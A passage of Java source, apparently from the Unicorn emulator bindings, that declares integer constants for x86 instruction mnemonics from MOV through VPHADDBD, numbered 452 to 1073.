UC_X86_INS_MONTMUL = 452; public static final int UC_X86_INS_MOV = 453; public static final int UC_X86_INS_MOVABS = 454; public static final int UC_X86_INS_MOVBE = 455; public static final int UC_X86_INS_MOVDDUP = 456; public static final int UC_X86_INS_MOVDQA = 457; public static final int UC_X86_INS_MOVDQU = 458; public static final int UC_X86_INS_MOVHLPS = 459; public static final int UC_X86_INS_MOVHPD = 460; public static final int UC_X86_INS_MOVHPS = 461; public static final int UC_X86_INS_MOVLHPS = 462; public static final int UC_X86_INS_MOVLPD = 463; public static final int UC_X86_INS_MOVLPS = 464; public static final int UC_X86_INS_MOVMSKPD = 465; public static final int UC_X86_INS_MOVMSKPS = 466; public static final int UC_X86_INS_MOVNTDQA = 467; public static final int UC_X86_INS_MOVNTDQ = 468; public static final int UC_X86_INS_MOVNTI = 469; public static final int UC_X86_INS_MOVNTPD = 470; public static final int UC_X86_INS_MOVNTPS = 471; public static final int UC_X86_INS_MOVNTSD = 472; public static final int UC_X86_INS_MOVNTSS = 473; public static final int UC_X86_INS_MOVSB = 474; public static final int UC_X86_INS_MOVSD = 475; public static final int UC_X86_INS_MOVSHDUP = 476; public static final int UC_X86_INS_MOVSLDUP = 477; public static final int UC_X86_INS_MOVSQ = 478; public static final int UC_X86_INS_MOVSS = 479; public static final int UC_X86_INS_MOVSW = 480; public static final int UC_X86_INS_MOVSX = 481; public static final int UC_X86_INS_MOVSXD = 482; public static final int UC_X86_INS_MOVUPD = 483; public static final int UC_X86_INS_MOVUPS = 484; public static final int UC_X86_INS_MOVZX = 485; public static final int UC_X86_INS_MPSADBW = 486; public static final int UC_X86_INS_MUL = 487; public static final int UC_X86_INS_MULPD = 488; public static final int UC_X86_INS_MULPS = 489; public static final int UC_X86_INS_MULSD = 490; public static final int UC_X86_INS_MULSS = 491; public static final int UC_X86_INS_MULX = 492; public static final int UC_X86_INS_FMUL = 493; public static final int UC_X86_INS_FIMUL = 494; public static final int UC_X86_INS_FMULP = 495; public static final int UC_X86_INS_MWAIT = 496; public static final int UC_X86_INS_NEG = 497; public static final int UC_X86_INS_NOP = 498; public static final int UC_X86_INS_NOT = 499; public static final int UC_X86_INS_OUT = 500; public static final int UC_X86_INS_OUTSB = 501; public static final int UC_X86_INS_OUTSD = 502; public static final int UC_X86_INS_OUTSW = 503; public static final int UC_X86_INS_PACKUSDW = 504; public static final int UC_X86_INS_PAUSE = 505; public static final int UC_X86_INS_PAVGUSB = 506; public static final int UC_X86_INS_PBLENDVB = 507; public static final int UC_X86_INS_PBLENDW = 508; public static final int UC_X86_INS_PCLMULQDQ = 509; public static final int UC_X86_INS_PCMPEQQ = 510; public static final int UC_X86_INS_PCMPESTRI = 511; public static final int UC_X86_INS_PCMPESTRM = 512; public static final int UC_X86_INS_PCMPGTQ = 513; public static final int UC_X86_INS_PCMPISTRI = 514; public static final int UC_X86_INS_PCMPISTRM = 515; public static final int UC_X86_INS_PCOMMIT = 516; public static final int UC_X86_INS_PDEP = 517; public static final int UC_X86_INS_PEXT = 518; public static final int UC_X86_INS_PEXTRB = 519; public static final int UC_X86_INS_PEXTRD = 520; public static final int UC_X86_INS_PEXTRQ = 521; public static final int UC_X86_INS_PF2ID = 522; public static final int UC_X86_INS_PF2IW = 523; public static final int UC_X86_INS_PFACC = 524; public static final int UC_X86_INS_PFADD = 525; public static final int UC_X86_INS_PFCMPEQ = 526; public static final int UC_X86_INS_PFCMPGE = 527; public static final int UC_X86_INS_PFCMPGT = 528; public static final int UC_X86_INS_PFMAX = 529; public static final int UC_X86_INS_PFMIN = 530; public static final int UC_X86_INS_PFMUL = 531; public static final int UC_X86_INS_PFNACC = 532; public static final int UC_X86_INS_PFPNACC = 533; public static final int UC_X86_INS_PFRCPIT1 = 534; public static final int UC_X86_INS_PFRCPIT2 = 535; public static final int UC_X86_INS_PFRCP = 536; public static final int UC_X86_INS_PFRSQIT1 = 537; public static final int UC_X86_INS_PFRSQRT = 538; public static final int UC_X86_INS_PFSUBR = 539; public static final int UC_X86_INS_PFSUB = 540; public static final int UC_X86_INS_PHMINPOSUW = 541; public static final int UC_X86_INS_PI2FD = 542; public static final int UC_X86_INS_PI2FW = 543; public static final int UC_X86_INS_PINSRB = 544; public static final int UC_X86_INS_PINSRD = 545; public static final int UC_X86_INS_PINSRQ = 546; public static final int UC_X86_INS_PMAXSB = 547; public static final int UC_X86_INS_PMAXSD = 548; public static final int UC_X86_INS_PMAXUD = 549; public static final int UC_X86_INS_PMAXUW = 550; public static final int UC_X86_INS_PMINSB = 551; public static final int UC_X86_INS_PMINSD = 552; public static final int UC_X86_INS_PMINUD = 553; public static final int UC_X86_INS_PMINUW = 554; public static final int UC_X86_INS_PMOVSXBD = 555; public static final int UC_X86_INS_PMOVSXBQ = 556; public static final int UC_X86_INS_PMOVSXBW = 557; public static final int UC_X86_INS_PMOVSXDQ = 558; public static final int UC_X86_INS_PMOVSXWD = 559; public static final int UC_X86_INS_PMOVSXWQ = 560; public static final int UC_X86_INS_PMOVZXBD = 561; public static final int UC_X86_INS_PMOVZXBQ = 562; public static final int UC_X86_INS_PMOVZXBW = 563; public static final int UC_X86_INS_PMOVZXDQ = 564; public static final int UC_X86_INS_PMOVZXWD = 565; public static final int UC_X86_INS_PMOVZXWQ = 566; public static final int UC_X86_INS_PMULDQ = 567; public static final int UC_X86_INS_PMULHRW = 568; public static final int UC_X86_INS_PMULLD = 569; public static final int UC_X86_INS_POP = 570; public static final int UC_X86_INS_POPAW = 571; public static final int UC_X86_INS_POPAL = 572; public static final int UC_X86_INS_POPCNT = 573; public static final int UC_X86_INS_POPF = 574; public static final int UC_X86_INS_POPFD = 575; public static final int UC_X86_INS_POPFQ = 576; public static final int UC_X86_INS_PREFETCH = 577; public static final int UC_X86_INS_PREFETCHNTA = 578; public static final int UC_X86_INS_PREFETCHT0 = 579; public static final int UC_X86_INS_PREFETCHT1 = 580; public static final int UC_X86_INS_PREFETCHT2 = 581; public static final int UC_X86_INS_PREFETCHW = 582; public static final int UC_X86_INS_PSHUFD = 583; public static final int UC_X86_INS_PSHUFHW = 584; public static final int UC_X86_INS_PSHUFLW = 585; public static final int UC_X86_INS_PSLLDQ = 586; public static final int UC_X86_INS_PSRLDQ = 587; public static final int UC_X86_INS_PSWAPD = 588; public static final int UC_X86_INS_PTEST = 589; public static final int UC_X86_INS_PUNPCKHQDQ = 590; public static final int UC_X86_INS_PUNPCKLQDQ = 591; public static final int UC_X86_INS_PUSH = 592; public static final int UC_X86_INS_PUSHAW = 593; public static final int UC_X86_INS_PUSHAL = 594; public static final int UC_X86_INS_PUSHF = 595; public static final int UC_X86_INS_PUSHFD = 596; public static final int UC_X86_INS_PUSHFQ = 597; public static final int UC_X86_INS_RCL = 598; public static final int UC_X86_INS_RCPPS = 599; public static final int UC_X86_INS_RCPSS = 600; public static final int UC_X86_INS_RCR = 601; public static final int UC_X86_INS_RDFSBASE = 602; public static final int UC_X86_INS_RDGSBASE = 603; public static final int UC_X86_INS_RDMSR = 604; public static final int UC_X86_INS_RDPMC = 605; public static final int UC_X86_INS_RDRAND = 606; public static final int UC_X86_INS_RDSEED = 607; public static final int UC_X86_INS_RDTSC = 608; public static final int UC_X86_INS_RDTSCP = 609; public static final int UC_X86_INS_ROL = 610; public static final int UC_X86_INS_ROR = 611; public static final int UC_X86_INS_RORX = 612; public static final int UC_X86_INS_ROUNDPD = 613; public static final int UC_X86_INS_ROUNDPS = 614; public static final int UC_X86_INS_ROUNDSD = 615; public static final int UC_X86_INS_ROUNDSS = 616; public static final int UC_X86_INS_RSM = 617; public static final int UC_X86_INS_RSQRTPS = 618; public static final int UC_X86_INS_RSQRTSS = 619; public static final int UC_X86_INS_SAHF = 620; public static final int UC_X86_INS_SAL = 621; public static final int UC_X86_INS_SALC = 622; public static final int UC_X86_INS_SAR = 623; public static final int UC_X86_INS_SARX = 624; public static final int UC_X86_INS_SBB = 625; public static final int UC_X86_INS_SCASB = 626; public static final int UC_X86_INS_SCASD = 627; public static final int UC_X86_INS_SCASQ = 628; public static final int UC_X86_INS_SCASW = 629; public static final int UC_X86_INS_SETAE = 630; public static final int UC_X86_INS_SETA = 631; public static final int UC_X86_INS_SETBE = 632; public static final int UC_X86_INS_SETB = 633; public static final int UC_X86_INS_SETE = 634; public static final int UC_X86_INS_SETGE = 635; public static final int UC_X86_INS_SETG = 636; public static final int UC_X86_INS_SETLE = 637; public static final int UC_X86_INS_SETL = 638; public static final int UC_X86_INS_SETNE = 639; public static final int UC_X86_INS_SETNO = 640; public static final int UC_X86_INS_SETNP = 641; public static final int UC_X86_INS_SETNS = 642; public static final int UC_X86_INS_SETO = 643; public static final int UC_X86_INS_SETP = 644; public static final int UC_X86_INS_SETS = 645; public static final int UC_X86_INS_SFENCE = 646; public static final int UC_X86_INS_SGDT = 647; public static final int UC_X86_INS_SHA1MSG1 = 648; public static final int UC_X86_INS_SHA1MSG2 = 649; public static final int UC_X86_INS_SHA1NEXTE = 650; public static final int UC_X86_INS_SHA1RNDS4 = 651; public static final int UC_X86_INS_SHA256MSG1 = 652; public static final int UC_X86_INS_SHA256MSG2 = 653; public static final int UC_X86_INS_SHA256RNDS2 = 654; public static final int UC_X86_INS_SHL = 655; public static final int UC_X86_INS_SHLD = 656; public static final int UC_X86_INS_SHLX = 657; public static final int UC_X86_INS_SHR = 658; public static final int UC_X86_INS_SHRD = 659; public static final int UC_X86_INS_SHRX = 660; public static final int UC_X86_INS_SHUFPD = 661; public static final int UC_X86_INS_SHUFPS = 662; public static final int UC_X86_INS_SIDT = 663; public static final int UC_X86_INS_FSIN = 664; public static final int UC_X86_INS_SKINIT = 665; public static final int UC_X86_INS_SLDT = 666; public static final int UC_X86_INS_SMSW = 667; public static final int UC_X86_INS_SQRTPD = 668; public static final int UC_X86_INS_SQRTPS = 669; public static final int UC_X86_INS_SQRTSD = 670; public static final int UC_X86_INS_SQRTSS = 671; public static final int UC_X86_INS_FSQRT = 672; public static final int UC_X86_INS_STAC = 673; public static final int UC_X86_INS_STC = 674; public static final int UC_X86_INS_STD = 675; public static final int UC_X86_INS_STGI = 676; public static final int UC_X86_INS_STI = 677; public static final int UC_X86_INS_STMXCSR = 678; public static final int UC_X86_INS_STOSB = 679; public static final int UC_X86_INS_STOSD = 680; public static final int UC_X86_INS_STOSQ = 681; public static final int UC_X86_INS_STOSW = 682; public static final int UC_X86_INS_STR = 683; public static final int UC_X86_INS_FST = 684; public static final int UC_X86_INS_FSTP = 685; public static final int UC_X86_INS_FSTPNCE = 686; public static final int UC_X86_INS_FXCH = 687; public static final int UC_X86_INS_SUBPD = 688; public static final int UC_X86_INS_SUBPS = 689; public static final int UC_X86_INS_FSUBR = 690; public static final int UC_X86_INS_FISUBR = 691; public static final int UC_X86_INS_FSUBRP = 692; public static final int UC_X86_INS_SUBSD = 693; public static final int UC_X86_INS_SUBSS = 694; public static final int UC_X86_INS_FSUB = 695; public static final int UC_X86_INS_FISUB = 696; public static final int UC_X86_INS_FSUBP = 697; public static final int UC_X86_INS_SWAPGS = 698; public static final int UC_X86_INS_SYSCALL = 699; public static final int UC_X86_INS_SYSENTER = 700; public static final int UC_X86_INS_SYSEXIT = 701; public static final int UC_X86_INS_SYSRET = 702; public static final int UC_X86_INS_T1MSKC = 703; public static final int UC_X86_INS_TEST = 704; public static final int UC_X86_INS_UD2 = 705; public static final int UC_X86_INS_FTST = 706; public static final int UC_X86_INS_TZCNT = 707; public static final int UC_X86_INS_TZMSK = 708; public static final int UC_X86_INS_FUCOMPI = 709; public static final int UC_X86_INS_FUCOMI = 710; public static final int UC_X86_INS_FUCOMPP = 711; public static final int UC_X86_INS_FUCOMP = 712; public static final int UC_X86_INS_FUCOM = 713; public static final int UC_X86_INS_UD2B = 714; public static final int UC_X86_INS_UNPCKHPD = 715; public static final int UC_X86_INS_UNPCKHPS = 716; public static final int UC_X86_INS_UNPCKLPD = 717; public static final int UC_X86_INS_UNPCKLPS = 718; public static final int UC_X86_INS_VADDPD = 719; public static final int UC_X86_INS_VADDPS = 720; public static final int UC_X86_INS_VADDSD = 721; public static final int UC_X86_INS_VADDSS = 722; public static final int UC_X86_INS_VADDSUBPD = 723; public static final int UC_X86_INS_VADDSUBPS = 724; public static final int UC_X86_INS_VAESDECLAST = 725; public static final int UC_X86_INS_VAESDEC = 726; public static final int UC_X86_INS_VAESENCLAST = 727; public static final int UC_X86_INS_VAESENC = 728; public static final int UC_X86_INS_VAESIMC = 729; public static final int UC_X86_INS_VAESKEYGENASSIST = 730; public static final int UC_X86_INS_VALIGND = 731; public static final int UC_X86_INS_VALIGNQ = 732; public static final int UC_X86_INS_VANDNPD = 733; public static final int UC_X86_INS_VANDNPS = 734; public static final int UC_X86_INS_VANDPD = 735; public static final int UC_X86_INS_VANDPS = 736; public static final int UC_X86_INS_VBLENDMPD = 737; public static final int UC_X86_INS_VBLENDMPS = 738; public static final int UC_X86_INS_VBLENDPD = 739; public static final int UC_X86_INS_VBLENDPS = 740; public static final int UC_X86_INS_VBLENDVPD = 741; public static final int UC_X86_INS_VBLENDVPS = 742; public static final int UC_X86_INS_VBROADCASTF128 = 743; public static final int UC_X86_INS_VBROADCASTI32X4 = 744; public static final int UC_X86_INS_VBROADCASTI64X4 = 745; public static final int UC_X86_INS_VBROADCASTSD = 746; public static final int UC_X86_INS_VBROADCASTSS = 747; public static final int UC_X86_INS_VCMPPD = 748; public static final int UC_X86_INS_VCMPPS = 749; public static final int UC_X86_INS_VCMPSD = 750; public static final int UC_X86_INS_VCMPSS = 751; public static final int UC_X86_INS_VCOMPRESSPD = 752; public static final int UC_X86_INS_VCOMPRESSPS = 753; public static final int UC_X86_INS_VCVTDQ2PD = 754; public static final int UC_X86_INS_VCVTDQ2PS = 755; public static final int UC_X86_INS_VCVTPD2DQX = 756; public static final int UC_X86_INS_VCVTPD2DQ = 757; public static final int UC_X86_INS_VCVTPD2PSX = 758; public static final int UC_X86_INS_VCVTPD2PS = 759; public static final int UC_X86_INS_VCVTPD2UDQ = 760; public static final int UC_X86_INS_VCVTPH2PS = 761; public static final int UC_X86_INS_VCVTPS2DQ = 762; public static final int UC_X86_INS_VCVTPS2PD = 763; public static final int UC_X86_INS_VCVTPS2PH = 764; public static final int UC_X86_INS_VCVTPS2UDQ = 765; public static final int UC_X86_INS_VCVTSD2SI = 766; public static final int UC_X86_INS_VCVTSD2USI = 767; public static final int UC_X86_INS_VCVTSS2SI = 768; public static final int UC_X86_INS_VCVTSS2USI = 769; public static final int UC_X86_INS_VCVTTPD2DQX = 770; public static final int UC_X86_INS_VCVTTPD2DQ = 771; public static final int UC_X86_INS_VCVTTPD2UDQ = 772; public static final int UC_X86_INS_VCVTTPS2DQ = 773; public static final int UC_X86_INS_VCVTTPS2UDQ = 774; public static final int UC_X86_INS_VCVTUDQ2PD = 775; public static final int UC_X86_INS_VCVTUDQ2PS = 776; public static final int UC_X86_INS_VDIVPD = 777; public static final int UC_X86_INS_VDIVPS = 778; public static final int UC_X86_INS_VDIVSD = 779; public static final int UC_X86_INS_VDIVSS = 780; public static final int UC_X86_INS_VDPPD = 781; public static final int UC_X86_INS_VDPPS = 782; public static final int UC_X86_INS_VERR = 783; public static final int UC_X86_INS_VERW = 784; public static final int UC_X86_INS_VEXP2PD = 785; public static final int UC_X86_INS_VEXP2PS = 786; public static final int UC_X86_INS_VEXPANDPD = 787; public static final int UC_X86_INS_VEXPANDPS = 788; public static final int UC_X86_INS_VEXTRACTF128 = 789; public static final int UC_X86_INS_VEXTRACTF32X4 = 790; public static final int UC_X86_INS_VEXTRACTF64X4 = 791; public static final int UC_X86_INS_VEXTRACTI128 = 792; public static final int UC_X86_INS_VEXTRACTI32X4 = 793; public static final int UC_X86_INS_VEXTRACTI64X4 = 794; public static final int UC_X86_INS_VEXTRACTPS = 795; public static final int UC_X86_INS_VFMADD132PD = 796; public static final int UC_X86_INS_VFMADD132PS = 797; public static final int UC_X86_INS_VFMADDPD = 798; public static final int UC_X86_INS_VFMADD213PD = 799; public static final int UC_X86_INS_VFMADD231PD = 800; public static final int UC_X86_INS_VFMADDPS = 801; public static final int UC_X86_INS_VFMADD213PS = 802; public static final int UC_X86_INS_VFMADD231PS = 803; public static final int UC_X86_INS_VFMADDSD = 804; public static final int UC_X86_INS_VFMADD213SD = 805; public static final int UC_X86_INS_VFMADD132SD = 806; public static final int UC_X86_INS_VFMADD231SD = 807; public static final int UC_X86_INS_VFMADDSS = 808; public static final int UC_X86_INS_VFMADD213SS = 809; public static final int UC_X86_INS_VFMADD132SS = 810; public static final int UC_X86_INS_VFMADD231SS = 811; public static final int UC_X86_INS_VFMADDSUB132PD = 812; public static final int UC_X86_INS_VFMADDSUB132PS = 813; public static final int UC_X86_INS_VFMADDSUBPD = 814; public static final int UC_X86_INS_VFMADDSUB213PD = 815; public static final int UC_X86_INS_VFMADDSUB231PD = 816; public static final int UC_X86_INS_VFMADDSUBPS = 817; public static final int UC_X86_INS_VFMADDSUB213PS = 818; public static final int UC_X86_INS_VFMADDSUB231PS = 819; public static final int UC_X86_INS_VFMSUB132PD = 820; public static final int UC_X86_INS_VFMSUB132PS = 821; public static final int UC_X86_INS_VFMSUBADD132PD = 822; public static final int UC_X86_INS_VFMSUBADD132PS = 823; public static final int UC_X86_INS_VFMSUBADDPD = 824; public static final int UC_X86_INS_VFMSUBADD213PD = 825; public static final int UC_X86_INS_VFMSUBADD231PD = 826; public static final int UC_X86_INS_VFMSUBADDPS = 827; public static final int UC_X86_INS_VFMSUBADD213PS = 828; public static final int UC_X86_INS_VFMSUBADD231PS = 829; public static final int UC_X86_INS_VFMSUBPD = 830; public static final int UC_X86_INS_VFMSUB213PD = 831; public static final int UC_X86_INS_VFMSUB231PD = 832; public static final int UC_X86_INS_VFMSUBPS = 833; public static final int UC_X86_INS_VFMSUB213PS = 834; public static final int UC_X86_INS_VFMSUB231PS = 835; public static final int UC_X86_INS_VFMSUBSD = 836; public static final int UC_X86_INS_VFMSUB213SD = 837; public static final int UC_X86_INS_VFMSUB132SD = 838; public static final int UC_X86_INS_VFMSUB231SD = 839; public static final int UC_X86_INS_VFMSUBSS = 840; public static final int UC_X86_INS_VFMSUB213SS = 841; public static final int UC_X86_INS_VFMSUB132SS = 842; public static final int UC_X86_INS_VFMSUB231SS = 843; public static final int UC_X86_INS_VFNMADD132PD = 844; public static final int UC_X86_INS_VFNMADD132PS = 845; public static final int UC_X86_INS_VFNMADDPD = 846; public static final int UC_X86_INS_VFNMADD213PD = 847; public static final int UC_X86_INS_VFNMADD231PD = 848; public static final int UC_X86_INS_VFNMADDPS = 849; public static final int UC_X86_INS_VFNMADD213PS = 850; public static final int UC_X86_INS_VFNMADD231PS = 851; public static final int UC_X86_INS_VFNMADDSD = 852; public static final int UC_X86_INS_VFNMADD213SD = 853; public static final int UC_X86_INS_VFNMADD132SD = 854; public static final int UC_X86_INS_VFNMADD231SD = 855; public static final int UC_X86_INS_VFNMADDSS = 856; public static final int UC_X86_INS_VFNMADD213SS = 857; public static final int UC_X86_INS_VFNMADD132SS = 858; public static final int UC_X86_INS_VFNMADD231SS = 859; public static final int UC_X86_INS_VFNMSUB132PD = 860; public static final int UC_X86_INS_VFNMSUB132PS = 861; public static final int UC_X86_INS_VFNMSUBPD = 862; public static final int UC_X86_INS_VFNMSUB213PD = 863; public static final int UC_X86_INS_VFNMSUB231PD = 864; public static final int UC_X86_INS_VFNMSUBPS = 865; public static final int UC_X86_INS_VFNMSUB213PS = 866; public static final int UC_X86_INS_VFNMSUB231PS = 867; public static final int UC_X86_INS_VFNMSUBSD = 868; public static final int UC_X86_INS_VFNMSUB213SD = 869; public static final int UC_X86_INS_VFNMSUB132SD = 870; public static final int UC_X86_INS_VFNMSUB231SD = 871; public static final int UC_X86_INS_VFNMSUBSS = 872; public static final int UC_X86_INS_VFNMSUB213SS = 873; public static final int UC_X86_INS_VFNMSUB132SS = 874; public static final int UC_X86_INS_VFNMSUB231SS = 875; public static final int UC_X86_INS_VFRCZPD = 876; public static final int UC_X86_INS_VFRCZPS = 877; public static final int UC_X86_INS_VFRCZSD = 878; public static final int UC_X86_INS_VFRCZSS = 879; public static final int UC_X86_INS_VORPD = 880; public static final int UC_X86_INS_VORPS = 881; public static final int UC_X86_INS_VXORPD = 882; public static final int UC_X86_INS_VXORPS = 883; public static final int UC_X86_INS_VGATHERDPD = 884; public static final int UC_X86_INS_VGATHERDPS = 885; public static final int UC_X86_INS_VGATHERPF0DPD = 886; public static final int UC_X86_INS_VGATHERPF0DPS = 887; public static final int UC_X86_INS_VGATHERPF0QPD = 888; public static final int UC_X86_INS_VGATHERPF0QPS = 889; public static final int UC_X86_INS_VGATHERPF1DPD = 890; public static final int UC_X86_INS_VGATHERPF1DPS = 891; public static final int UC_X86_INS_VGATHERPF1QPD = 892; public static final int UC_X86_INS_VGATHERPF1QPS = 893; public static final int UC_X86_INS_VGATHERQPD = 894; public static final int UC_X86_INS_VGATHERQPS = 895; public static final int UC_X86_INS_VHADDPD = 896; public static final int UC_X86_INS_VHADDPS = 897; public static final int UC_X86_INS_VHSUBPD = 898; public static final int UC_X86_INS_VHSUBPS = 899; public static final int UC_X86_INS_VINSERTF128 = 900; public static final int UC_X86_INS_VINSERTF32X4 = 901; public static final int UC_X86_INS_VINSERTF32X8 = 902; public static final int UC_X86_INS_VINSERTF64X2 = 903; public static final int UC_X86_INS_VINSERTF64X4 = 904; public static final int UC_X86_INS_VINSERTI128 = 905; public static final int UC_X86_INS_VINSERTI32X4 = 906; public static final int UC_X86_INS_VINSERTI32X8 = 907; public static final int UC_X86_INS_VINSERTI64X2 = 908; public static final int UC_X86_INS_VINSERTI64X4 = 909; public static final int UC_X86_INS_VINSERTPS = 910; public static final int UC_X86_INS_VLDDQU = 911; public static final int UC_X86_INS_VLDMXCSR = 912; public static final int UC_X86_INS_VMASKMOVDQU = 913; public static final int UC_X86_INS_VMASKMOVPD = 914; public static final int UC_X86_INS_VMASKMOVPS = 915; public static final int UC_X86_INS_VMAXPD = 916; public static final int UC_X86_INS_VMAXPS = 917; public static final int UC_X86_INS_VMAXSD = 918; public static final int UC_X86_INS_VMAXSS = 919; public static final int UC_X86_INS_VMCALL = 920; public static final int UC_X86_INS_VMCLEAR = 921; public static final int UC_X86_INS_VMFUNC = 922; public static final int UC_X86_INS_VMINPD = 923; public static final int UC_X86_INS_VMINPS = 924; public static final int UC_X86_INS_VMINSD = 925; public static final int UC_X86_INS_VMINSS = 926; public static final int UC_X86_INS_VMLAUNCH = 927; public static final int UC_X86_INS_VMLOAD = 928; public static final int UC_X86_INS_VMMCALL = 929; public static final int UC_X86_INS_VMOVQ = 930; public static final int UC_X86_INS_VMOVDDUP = 931; public static final int UC_X86_INS_VMOVD = 932; public static final int UC_X86_INS_VMOVDQA32 = 933; public static final int UC_X86_INS_VMOVDQA64 = 934; public static final int UC_X86_INS_VMOVDQA = 935; public static final int UC_X86_INS_VMOVDQU16 = 936; public static final int UC_X86_INS_VMOVDQU32 = 937; public static final int UC_X86_INS_VMOVDQU64 = 938; public static final int UC_X86_INS_VMOVDQU8 = 939; public static final int UC_X86_INS_VMOVDQU = 940; public static final int UC_X86_INS_VMOVHLPS = 941; public static final int UC_X86_INS_VMOVHPD = 942; public static final int UC_X86_INS_VMOVHPS = 943; public static final int UC_X86_INS_VMOVLHPS = 944; public static final int UC_X86_INS_VMOVLPD = 945; public static final int UC_X86_INS_VMOVLPS = 946; public static final int UC_X86_INS_VMOVMSKPD = 947; public static final int UC_X86_INS_VMOVMSKPS = 948; public static final int UC_X86_INS_VMOVNTDQA = 949; public static final int UC_X86_INS_VMOVNTDQ = 950; public static final int UC_X86_INS_VMOVNTPD = 951; public static final int UC_X86_INS_VMOVNTPS = 952; public static final int UC_X86_INS_VMOVSD = 953; public static final int UC_X86_INS_VMOVSHDUP = 954; public static final int UC_X86_INS_VMOVSLDUP = 955; public static final int UC_X86_INS_VMOVSS = 956; public static final int UC_X86_INS_VMOVUPD = 957; public static final int UC_X86_INS_VMOVUPS = 958; public static final int UC_X86_INS_VMPSADBW = 959; public static final int UC_X86_INS_VMPTRLD = 960; public static final int UC_X86_INS_VMPTRST = 961; public static final int UC_X86_INS_VMREAD = 962; public static final int UC_X86_INS_VMRESUME = 963; public static final int UC_X86_INS_VMRUN = 964; public static final int UC_X86_INS_VMSAVE = 965; public static final int UC_X86_INS_VMULPD = 966; public static final int UC_X86_INS_VMULPS = 967; public static final int UC_X86_INS_VMULSD = 968; public static final int UC_X86_INS_VMULSS = 969; public static final int UC_X86_INS_VMWRITE = 970; public static final int UC_X86_INS_VMXOFF = 971; public static final int UC_X86_INS_VMXON = 972; public static final int UC_X86_INS_VPABSB = 973; public static final int UC_X86_INS_VPABSD = 974; public static final int UC_X86_INS_VPABSQ = 975; public static final int UC_X86_INS_VPABSW = 976; public static final int UC_X86_INS_VPACKSSDW = 977; public static final int UC_X86_INS_VPACKSSWB = 978; public static final int UC_X86_INS_VPACKUSDW = 979; public static final int UC_X86_INS_VPACKUSWB = 980; public static final int UC_X86_INS_VPADDB = 981; public static final int UC_X86_INS_VPADDD = 982; public static final int UC_X86_INS_VPADDQ = 983; public static final int UC_X86_INS_VPADDSB = 984; public static final int UC_X86_INS_VPADDSW = 985; public static final int UC_X86_INS_VPADDUSB = 986; public static final int UC_X86_INS_VPADDUSW = 987; public static final int UC_X86_INS_VPADDW = 988; public static final int UC_X86_INS_VPALIGNR = 989; public static final int UC_X86_INS_VPANDD = 990; public static final int UC_X86_INS_VPANDND = 991; public static final int UC_X86_INS_VPANDNQ = 992; public static final int UC_X86_INS_VPANDN = 993; public static final int UC_X86_INS_VPANDQ = 994; public static final int UC_X86_INS_VPAND = 995; public static final int UC_X86_INS_VPAVGB = 996; public static final int UC_X86_INS_VPAVGW = 997; public static final int UC_X86_INS_VPBLENDD = 998; public static final int UC_X86_INS_VPBLENDMB = 999; public static final int UC_X86_INS_VPBLENDMD = 1000; public static final int UC_X86_INS_VPBLENDMQ = 1001; public static final int UC_X86_INS_VPBLENDMW = 1002; public static final int UC_X86_INS_VPBLENDVB = 1003; public static final int UC_X86_INS_VPBLENDW = 1004; public static final int UC_X86_INS_VPBROADCASTB = 1005; public static final int UC_X86_INS_VPBROADCASTD = 1006; public static final int UC_X86_INS_VPBROADCASTMB2Q = 1007; public static final int UC_X86_INS_VPBROADCASTMW2D = 1008; public static final int UC_X86_INS_VPBROADCASTQ = 1009; public static final int UC_X86_INS_VPBROADCASTW = 1010; public static final int UC_X86_INS_VPCLMULQDQ = 1011; public static final int UC_X86_INS_VPCMOV = 1012; public static final int UC_X86_INS_VPCMPB = 1013; public static final int UC_X86_INS_VPCMPD = 1014; public static final int UC_X86_INS_VPCMPEQB = 1015; public static final int UC_X86_INS_VPCMPEQD = 1016; public static final int UC_X86_INS_VPCMPEQQ = 1017; public static final int UC_X86_INS_VPCMPEQW = 1018; public static final int UC_X86_INS_VPCMPESTRI = 1019; public static final int UC_X86_INS_VPCMPESTRM = 1020; public static final int UC_X86_INS_VPCMPGTB = 1021; public static final int UC_X86_INS_VPCMPGTD = 1022; public static final int UC_X86_INS_VPCMPGTQ = 1023; public static final int UC_X86_INS_VPCMPGTW = 1024; public static final int UC_X86_INS_VPCMPISTRI = 1025; public static final int UC_X86_INS_VPCMPISTRM = 1026; public static final int UC_X86_INS_VPCMPQ = 1027; public static final int UC_X86_INS_VPCMPUB = 1028; public static final int UC_X86_INS_VPCMPUD = 1029; public static final int UC_X86_INS_VPCMPUQ = 1030; public static final int UC_X86_INS_VPCMPUW = 1031; public static final int UC_X86_INS_VPCMPW = 1032; public static final int UC_X86_INS_VPCOMB = 1033; public static final int UC_X86_INS_VPCOMD = 1034; public static final int UC_X86_INS_VPCOMPRESSD = 1035; public static final int UC_X86_INS_VPCOMPRESSQ = 1036; public static final int UC_X86_INS_VPCOMQ = 1037; public static final int UC_X86_INS_VPCOMUB = 1038; public static final int UC_X86_INS_VPCOMUD = 1039; public static final int UC_X86_INS_VPCOMUQ = 1040; public static final int UC_X86_INS_VPCOMUW = 1041; public static final int UC_X86_INS_VPCOMW = 1042; public static final int UC_X86_INS_VPCONFLICTD = 1043; public static final int UC_X86_INS_VPCONFLICTQ = 1044; public static final int UC_X86_INS_VPERM2F128 = 1045; public static final int UC_X86_INS_VPERM2I128 = 1046; public static final int UC_X86_INS_VPERMD = 1047; public static final int UC_X86_INS_VPERMI2D = 1048; public static final int UC_X86_INS_VPERMI2PD = 1049; public static final int UC_X86_INS_VPERMI2PS = 1050; public static final int UC_X86_INS_VPERMI2Q = 1051; public static final int UC_X86_INS_VPERMIL2PD = 1052; public static final int UC_X86_INS_VPERMIL2PS = 1053; public static final int UC_X86_INS_VPERMILPD = 1054; public static final int UC_X86_INS_VPERMILPS = 1055; public static final int UC_X86_INS_VPERMPD = 1056; public static final int UC_X86_INS_VPERMPS = 1057; public static final int UC_X86_INS_VPERMQ = 1058; public static final int UC_X86_INS_VPERMT2D = 1059; public static final int UC_X86_INS_VPERMT2PD = 1060; public static final int UC_X86_INS_VPERMT2PS = 1061; public static final int UC_X86_INS_VPERMT2Q = 1062; public static final int UC_X86_INS_VPEXPANDD = 1063; public static final int UC_X86_INS_VPEXPANDQ = 1064; public static final int UC_X86_INS_VPEXTRB = 1065; public static final int UC_X86_INS_VPEXTRD = 1066; public static final int UC_X86_INS_VPEXTRQ = 1067; public static final int UC_X86_INS_VPEXTRW = 1068; public static final int UC_X86_INS_VPGATHERDD = 1069; public static final int UC_X86_INS_VPGATHERDQ = 1070; public static final int UC_X86_INS_VPGATHERQD = 1071; public static final int UC_X86_INS_VPGATHERQQ = 1072; public static final int UC_X86_INS_VPHADDBD = 1073; public static final int 